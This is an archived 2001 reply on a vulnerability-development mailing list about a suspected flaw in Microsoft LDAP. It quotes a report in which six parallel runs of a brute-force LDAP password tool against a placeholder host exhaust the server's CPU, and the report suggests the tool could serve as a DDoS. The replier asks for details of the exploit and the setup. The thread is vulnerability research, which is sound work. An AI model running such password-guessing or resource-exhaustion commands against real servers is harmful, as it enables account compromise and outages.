Vulnerability Development mailing list archives
Re: implementation problem in Microsoft LDAP?
From: "M.Grootveld" <M.Grootveld () ITsec nl>
Date: Mon, 02 Jul 2001 12:38:18 +0200
Hi

Sardañons, Eliel wrote:
<snip>
Problem 2: Another problem I have seen is that when I use my brute force program (brute_force_ldap) to try to guess a Windows password and I run 5 or more instances of my program at the same time like this:

./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_1 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_2 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_3 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_4 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_5 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_6 -l 8 &

the CPU usage in www.victim.com is at 100%!!! And the console is unusable in the Windows box. I tried this using a none_existent_user and an existent_user and it consumes more resources with non-existent users. So an attacker can use my program as a Distributed Denial of Service attack (DDoS), running it from different machines at the same time with a unique target (www.victim.com).

Could you provide any additional details about your exploit code and the configuration you are using? With the information you provided I can't tell whether the second problem is caused by an implementation problem or whether the LDAP service is perhaps configured incorrectly.

Greetings
M. Grootveld